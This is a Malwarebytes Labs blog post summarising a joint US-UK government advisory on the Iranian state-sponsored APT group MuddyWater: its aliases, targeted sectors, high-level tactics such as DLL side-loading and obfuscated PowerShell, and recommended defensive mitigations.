CISA warns of cyberespionage by Iranian APT “MuddyWater”


Cybersecurity agencies in the US and UK have issued a joint [cybersecurity advisory (CSA)](<https://www.cisa.gov/uscert/ncas/alerts/aa22-055a>) on MuddyWater, a government-sponsored Iranian advanced persistent threat (APT) actor. The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the US Cyber Command Cyber National Mission Force (CNMF), and the National Security Agency (NSA), together with the UK's National Cyber Security Centre (NCSC), have detailed operations by this APT against a range of governments and private organizations around the world. MuddyWater, also known as Earth Vetala, MERCURY, Seedworm, Static Kitten, and TEMP.Zargos, has its eyes set on the telecommunications, defense, local government, and oil and natural gas sectors—among others—in Africa, Asia, Europe, and North America. > Even as we remain laser-focused on Russian malicious cyber activity, we cannot fail to see around the corners. Our latest advisory provides details on Iranian government-sponsored APT actors known as MuddyWater: <https://t.co/sgWJ8jRbTZ> [#ShieldsUp](<https://twitter.com/hashtag/ShieldsUp?src=hash&ref_src=twsrc%5Etfw>) [pic.twitter.com/TwjTvkxWlE](<https://t.co/TwjTvkxWlE>) > > -- Jen Easterly (@CISAJen) [February 24, 2022](<https://twitter.com/CISAJen/status/1496894349803769860?ref_src=twsrc%5Etfw>) "MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS),” the advisory briefs its readers. “This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors." "MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions." The full advisory can be read in _[this CISA web page](<https://www.cisa.gov/uscert/ncas/alerts/aa22-055a>)_. It can also be downloaded as a _[PDF file](<https://www.ic3.gov/Media/News/2022/220224.pdf>)_. The advisory lastly reminds readers to take mitigating steps to protect themselves from malicious MuddyWater campaigns. Ensure that software is patched, prioritizing applications and operating systems with _[known, exploitable vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)_. Back it up with [an effective antivirus solution](<https://www.malwarebytes.com/pricing>), EDR and SIEM. Use _[multifactor authentication (MFA)](<https://blog.malwarebytes.com/glossary/multi-factor-authentication-mfa/>)_ wherever you can. Limit access to resources according to the [principle of least privilege](<https://en.wikipedia.org/wiki/Principle_of_least_privilege>). Lastly, ensure that emplyees are trained to be alert for suspicious emails or social media posts—they could be the start of a phishing attack. The post [CISA warns of cyberespionage by Iranian APT "MuddyWater"](<https://blog.malwarebytes.com/awareness/2022/02/cisa-warns-of-cyberespionage-by-iranian-apt-muddywater/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).